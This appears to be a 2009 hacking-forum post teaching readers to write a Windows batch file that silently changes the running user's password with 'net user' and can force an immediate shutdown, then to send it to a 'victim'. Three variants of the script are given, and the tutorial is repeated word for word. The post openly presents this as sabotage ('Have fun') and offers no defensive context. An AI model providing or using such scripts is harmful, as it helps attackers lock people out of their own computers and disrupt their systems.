1 How To Change Someone Computer Password Using A Batch! 6th August 2009, 6:44 pm
C0D3R
MITR Master
This tutorial is on sending your victim a batch file and it will change there windows password!
Ok 1st.. Open notepad type one of the following..
(Choices on what will happen's to the victim's computer)
.................................................................................................
Choices :
.................................................................................................
Code with personal message:
@echo off
net user %USERNAME% (The new password) > NUL
echo (Your personal message)
pause > NUL
.................................................................................................
Code without personal message:
@net user %USERNAME% (The new password) > NUL
.................................................................................................
Code with shutdown command (Shutdown's victims PC after execute):
@net user %USERNAME% (The new password) > NUL
@shutdown -s -t 0
.................................................................................................
[The dots are to seperate the methods!]
Ok now go to file , Save as , NameOfFile.bat and then send it to your
victim and there password will change to whatever you like!
Example : @net user Bobby "Password123" > NUL
@shutdown -s -t 0
Have fun
Ok 1st.. Open notepad type one of the following..
(Choices on what will happen's to the victim's computer)
.................................................................................................
Choices :
.................................................................................................
Code with personal message:
@echo off
net user %USERNAME% (The new password) > NUL
echo (Your personal message)
pause > NUL
.................................................................................................
Code without personal message:
@net user %USERNAME% (The new password) > NUL
.................................................................................................
Code with shutdown command (Shutdown's victims PC after execute):
@net user %USERNAME% (The new password) > NUL
@shutdown -s -t 0
.................................................................................................
[The dots are to seperate the methods!]
Ok now go to file , Save as , NameOfFile.bat and then send it to your
victim and there password will change to whatever you like!
Example : @net user Bobby "Password123" > NUL
@shutdown -s -t 0
Have fun